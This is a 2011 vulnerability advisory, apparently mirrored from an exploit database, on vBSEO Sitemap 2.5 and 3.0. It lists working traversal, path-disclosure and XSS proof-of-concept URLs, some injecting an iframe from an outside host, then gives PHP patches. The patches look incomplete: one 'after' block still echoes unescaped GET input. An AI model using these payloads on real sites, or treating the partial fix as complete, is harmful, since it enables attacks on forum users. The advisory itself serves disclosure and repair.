扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 |
vBSEO Sitemap - Multiple Vulnerabilities Versions Affected: 2.5 and 3.0 (Most likely all versions) Info: A proven success record, vBSEO powers the most optimized forums on the Web. The #1 SEO plugin and the only professional, fully supported solution. A full package of SEO enhancements, one install, one upgrade. External Links: http://www.vbseo.com Credits: MaXe (@InterN0T) -:: The Advisory ::- vBSEO is prone to multiple vulnerabilities, such as path disclosure, enumeration of files, persistent and non-persistent XSS. Please see the details below. vBSEO Sitemap 3.0 Gold: Enumeration and confirmation of files: http://www.target.tld/vbulletin/upload/vbseo_sitemap/index.php?rlist=true&details=../../../vb4_readme.txt http://www.target.tld/vbulletin/upload/vbseo_sitemap/index.php?hitdetails=../../../../vb4_readme.txt Proof of Concept XSS: (Non-Persistent) http://www.target.tld/vbulletin/upload/vbseo_sitemap/index.php?dlist=true&botsonly=%22%3E%3Ciframe%20frameborder=%270%27%20border=0%20width=%27425%27%20height=%27344%27%20src=%27http://pown.it/obj.php?ID=5312%27%20name=iframe%20scrolling=no%20style=%27position:absolute;%27%20allowtransparency=%27true%27%3E%3C/iframe%3E http://www.target.tld/vbulletin/upload/vbseo_sitemap/index.php?hitdetails=PADPAD%20%3Ciframe%20frameborder=%270%27%20border=0%20width=%27425%27%20height=%27344%27%20src=%27http://pown.it/obj.php?ID=3663%27%20name=iframe%20scrolling=no%20style=%27position:absolute;%27%20allowtransparency=%27true%27%3E%3C/iframe%3E Path Disclosure: (any file in the addon directory - includes fatal errors) http://www.target.tld/vbulletin/upload/vbseo_sitemap/addons/vbseo_sm_calendar.php http://www.target.tld/vbulletin/upload/vbseo_sitemap/addons/vbseo_sm_downloads.php http://www.target.tld/vbulletin/upload/vbseo_sitemap/addons/vbseo_sm_downloads2.php http://www.target.tld/vbulletin/upload/vbseo_sitemap/addons/vbseo_sm_medialibrary.php http://www.target.tld/vbulletin/upload/vbseo_sitemap/addons/vbseo_sm_vba.php http://www.target.tld/vbulletin/upload/vbseo_sitemap/addons/vbseo_sm_vba_links.php http://www.target.tld/vbulletin/upload/vbseo_sitemap/addons/vbseo_sm_vba_links3.php http://www.target.tld/vbulletin/upload/vbseo_sitemap/addons/vbseo_sm_vbagallery.php ----------------------- END OF vBSEO 3.0 ----------------------- vBSEO Sitemap 2.5: (initial first release) Enumeration and confirmation of files: http://www.target.tld/vbseo_sitemap/index.php?details=../../robots.txt http://www.target.tld/vbseo_sitemap/index.php?hitdetails=../../../robots.txt Non-Persistent XSS: (PoC) http://www.target.tld/vbseo_sitemap/index.php?dlist=true&botsonly=%22%3E%3Cscript%3Edocument.documentElement.innerHTML=%22%3Ciframe%20frameborder=%270%27%20border=0%20width=%27425%27%20height=%27344%27%20src=%27http://pown.it/obj.php?ID=5312%27%20name=iframe%20scrolling=no%20style=%27position:absolute;%27%20allowtransparency=%27true%27%3E%3C/iframe%3E%22;%3C/script%3E [May require bot hits to work!] http://www.target.tld/vbseo_sitemap/index.php?removedl[0]=&botsonly=%22%3E%3Cscript%3Edocument.documentElement.innerHTML=%22%3Ciframe%20frameborder=%270%27%20border=0%20width=%27425%27%20height=%27344%27%20src=%27http://pown.it/obj.php?ID=5312%27%20name=iframe%20scrolling=no%20style=%27position:absolute;%27%20allowtransparency=%27true%27%3E%3C/iframe%3E%22;%3C/script%3E http://www.target.tld/vbseo_sitemap/index.php?hitdetails=PADPAD%20%3Ciframe%20frameborder=%270%27%20border=0%20width=%27425%27%20height=%27344%27%20src=%27http://pown.it/obj.php?ID=3663%27%20name=iframe%20scrolling=no%20style=%27position:absolute;%27%20allowtransparency=%27true%27%3E%3C/iframe%3E Path Disclosure: (any file in the addon directory - includes fatal errors) http://www.target.tld/vbulletin/upload/vbseo_sitemap/addons/vbseo_sm_calendar.php http://www.target.tld/vbulletin/upload/vbseo_sitemap/addons/vbseo_sm_downloads.php http://www.target.tld/vbulletin/upload/vbseo_sitemap/addons/vbseo_sm_downloads2.php http://www.target.tld/vbulletin/upload/vbseo_sitemap/addons/vbseo_sm_vba.php http://www.target.tld/vbulletin/upload/vbseo_sitemap/addons/vbseo_sm_vba_links.php http://www.target.tld/includes/functions_vbseo_url.php ----------------------- END OF vBSEO 2.5 ----------------------- vBSEO Sitemap: (Most likely all versions) Persistent XSS: 1) The user-agent is not sanitized in a sufficient way allowing an attacker to inject persistent scripts. 2) Then the attacker must request the sitemap via one of the following links: - http://www.target.tld/vbulletin/upload/vbseo_sitemap/index.php?dlist=true - http://www.target.tld/vbulletin/upload/vbseo_sitemap/vbseo_getsitemap.php?sitemap=sitemap_index.xml.gz 3) Then an authenticated administrator must view one of the pages containing the injected and potentially malicious user-agent: http://www.target.tld/vbseo_sitemap/index.php?dlist=true&page=357 [!] All vulnerabilities requires authentication and they do not survive a login screen, making them almost harmless. -:: Solution ::- Before: (file: index.php within vbseo_sitemap) -- Version 2.5 <tr class="<?php echo $dd%2?'altfirst':'altsecond'?>"> <td><?php echo $dn+($cpage-1)*VBSEO_SM_PAGESIZE?></td> <td align="right"><?php echo $sdate?></td> <td><?php echo $dl['sitemap']?></td> <td><b><?php echo $dl['ua']?></b></td> <td><?php echo $dl['ip']?></td> <td><?php echo $dl['useragent']?></td> <td> <a href="https://www.exploit-db.com/exploits/16077/index.php?removedl[<?php echo $dn?>]=<?php echo $dl['time']?>&botsonly=<?php echo $_GET['botsonly']?>" onclick="return confirm('Are you sure?')">Rem$ </td> <td> <input type="checkbox" name="removedl[<?php echo $dn?>]" value="<?php echo $dl['time']?>"> </td> </tr> After:_______________________________________________________ <tr class="<?php echo $dd%2?'altfirst':'altsecond'?>"> <td><?php echo $dn+($cpage-1)*VBSEO_SM_PAGESIZE?></td> <td align="right"><?php echo $sdate?></td> <td><?php echo $dl['sitemap']?></td> <td><b><?php echo $dl['ua']?></b></td> <td><?php echo $dl['ip']?></td> <td><?php echo htmlentities($dl['useragent'])?></td> <td> <a href="https://www.exploit-db.com/exploits/16077/index.php?removedl[<?php echo $dn?>]=<?php echo $dl['time']?>&botsonly=<?php echo $_GET['botsonly']?>" onclick="return confirm('Are you sure?')">Rem$ </td> <td> <input type="checkbox" name="removedl[<?php echo $dn?>]" value="<?php echo $dl['time']?>"> </td> </tr> --------------------------------------------------------------------------------------------- Before: (file: index.php within vbseo_sitemap) -- Version 3.0 <tr class="<?php echo $dd%2?'altfirst':'altsecond'?>"> <td class="<?php echo $dd%2?'alt1':'alt2'?>"><?php echo $dn+($cpage-1)*VBSEO_SM_PAGESIZE?></td> <td class="<?php echo $dd%2?'alt1':'alt2'?>" align="right"><?php echo $sdate?></td> <td class="<?php echo $dd%2?'alt1':'alt2'?>"><?php echo $dl['sitemap']?></td> <td class="<?php echo $dd%2?'alt1':'alt2'?>"><b><?php echo $dl['ua']?></b></td> <td class="<?php echo $dd%2?'alt1':'alt2'?>"><?php echo $dl['ip']?></td> <td class="<?php echo $dd%2?'alt1':'alt2'?>"><?php echo htmlentities($dl['useragent'])?></td> <td class="<?php echo $dd%2?'alt1':'alt2'?>"> After:_______________________________________________________ <tr class="<?php echo $dd%2?'altfirst':'altsecond'?>"> <td class="<?php echo $dd%2?'alt1':'alt2'?>"><?php echo $dn+($cpage-1)*VBSEO_SM_PAGESIZE?></td> <td class="<?php echo $dd%2?'alt1':'alt2'?>" align="right"><?php echo $sdate?></td> <td class="<?php echo $dd%2?'alt1':'alt2'?>"><?php echo $dl['sitemap']?></td> <td class="<?php echo $dd%2?'alt1':'alt2'?>"><b><?php echo $dl['ua']?></b></td> <td class="<?php echo $dd%2?'alt1':'alt2'?>"><?php echo $dl['ip']?></td> <td class="<?php echo $dd%2?'alt1':'alt2'?>"><?php echo htmlentities($dl['useragent'])?></td> <td class="<?php echo $dd%2?'alt1':'alt2'?>"> --------------------------------------------------------------------------------------------- In addition, vbseo_getsitemap.php which grabs the unsanitized user-agent can also be fixed by finding this line: 'useragent'=>$_SERVER['HTTP_USER_AGENT'], And changing it to this: 'useragent'=>htmlentities($_SERVER['HTTP_USER_AGENT']), Disclosure Information: - Vulnerability found and researched: ~27th December 2010 - Semi-Disclosed at InterN0T: 30th December - Detailed Disclosure: 31st January 2011 References: http://forum.intern0t.net/intern0t-advisories/3632-vbseo-sitemap-2-5-3-0-multiple-minor-vulnerabilities.html |
体验盒子
